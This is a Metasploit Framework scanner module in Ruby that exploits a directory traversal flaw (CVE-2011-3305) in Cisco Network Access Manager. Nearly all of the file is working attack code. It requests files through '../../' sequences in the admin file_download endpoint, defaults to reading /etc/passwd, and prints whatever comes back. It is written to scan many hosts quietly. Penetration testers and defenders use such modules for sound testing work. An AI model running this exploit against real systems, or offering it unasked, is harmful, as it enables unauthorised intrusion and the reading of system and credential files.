GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  # Module metadata and datastore options. SSL is on by default and RPORT
  # defaults to 443, so the target is assumed to be the HTTPS admin interface.
  def initialize
    super(
      'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
      'Description' => %q{
        This module tests whether a directory traversal vulnerability is present
        in versions of Cisco Network Access Manager 4.8.x You may wish to change
        FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
      },
      'References' =>
        [
          [ 'CVE', '2011-3305' ],
          [ 'OSVDB', '76080']
        ],
      'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SSL' => true
      }
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
        OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
      ])
  end

  # Check one host: confirm /admin answers at all, then request FILE behind an
  # increasing number of '../../' segments (1..MAXDIRS) and stop at the first
  # HTTP 200.
  #
  # @param ip [String] target address handed over by the scanner mixin
  #   (unused here; the HttpClient mixin's rhost/rport are used instead)
  def run_host(ip)
    step = '../../'
    prefix = '/admin/file_download?tag='
    suffix = '&fileType=snapshot'

    print_status("Attempting to connect to #{rhost}:#{rport}")
    # Baseline request with a 25s timeout: probing only happens when the
    # admin interface returned any response object at all.
    probe = send_request_raw(
      {
        'method' => 'GET',
        'uri' => '/admin',
      }, 25)
    return unless probe

    1.upto(datastore['MAXDIRS']) do |depth|
      uri = prefix + (step * depth) + datastore['FILE'] + suffix
      res = send_request_raw(
        {
          'method' => 'GET',
          'uri' => uri,
        }, 25)
      # No response, or a response without a status code, is skipped silently.
      next unless res && res.code

      if res.code == 200
        # Any 200 is reported as a possible hit; the body is printed verbatim
        # but never inspected, so a 200 error page also lands here.
        print_status("Request ##{depth} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
        break
      end
      print_error("Attempt ##{depth} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
    end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    # Unreachable hosts are expected during a scan and are passed over quietly.
  rescue ::Timeout::Error, ::Errno::EPIPE
    # Stalled or dropped connections are likewise passed over without output.
  end
end